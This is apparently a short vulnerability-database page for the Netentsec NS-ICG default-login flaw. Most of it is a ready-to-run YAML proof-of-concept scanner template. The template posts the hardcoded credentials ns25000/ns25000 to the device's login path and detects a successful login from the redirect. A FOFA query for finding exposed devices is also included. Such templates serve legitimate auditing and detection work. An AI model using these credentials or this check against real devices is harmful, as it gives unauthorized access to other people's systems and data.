ns-icg-default-password: NS-ICG Default Password

2025-08-01 ns-icg-default-password PoC Public

Description

Netentsec NS-ICG contains a default login vulnerability. An attacker can obtain access to user accounts and access sensitive information, modify data, and/or execute unauthorized operations.

fofa: "NS-ICG"

PoC

id: ns-icg-default-password

info:
  name: NS-ICG Default Password
  author: pikpikcu
  severity: high
  verified: true
  description: |-
    Netentsec NS-ICG contains a default login vulnerability. An attacker can obtain access to user accounts and access sensitive information, modify data, and/or execute unauthorized operations.
    fofa: "NS-ICG"
  reference:
    - https://www.cnvd.org.cn/flaw/show/CNVD-2016-08603
  tags: nsicg,default-login
  created: 2023/06/17

rules:
  r0:
    request:
      method: POST
      path: /user/login/login
      body: usrname=ns25000&pass=ns25000&signinfo=&ukey_user_flag=0&SlotSerialNumber=&agree=
    expression: response.status == 302 && response.raw_header.bcontains(b'/user/main/')
expression: r0()

# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.

References

Related Vulnerabilities